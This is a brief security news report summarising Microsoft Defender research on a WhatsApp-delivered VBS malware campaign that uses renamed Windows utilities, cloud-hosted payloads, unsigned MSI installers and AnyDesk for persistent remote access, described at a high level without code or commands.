MICROSOFT Defender Security Research Team has detailed a WhatsApp-based malware campaign that began in late February 2026, delivering malicious Visual Basic Script (VBS) files via WhatsApp messages. Once executed, the scripts establish a multi-stage infection chain to achieve persistence and remote access, using renamed Windows utilities such as curl[.]exe renamed to netapi[.]dll and bitsadmin[.]exe renamed to sc[.]exe to blend in with normal activity.
The campaign retrieves additional payloads from trusted cloud services—Amazon S3 buckets in AWS, Tencent Cloud, and Backblaze B2—and then delivers malicious MSI installers, including Setup[.]msi, WinRAR[.]msi, LinkPoint[.]msi, and AnyDesk[.]msi, all unsigned. Final payloads enable attackers to establish remote access and maintain presence on compromised devices, with AnyDesk specifically cited as a tool used for persistent connectivity.
The operators also attempt to bypass User Account Control and modify registry entries under HKLM\Software\Microsoft\Win to suppress prompts and sustain a long-term foothold. Cloud hosting and legitimate utilities are employed to reduce detection, highlighting the blending of trusted services with malware delivery.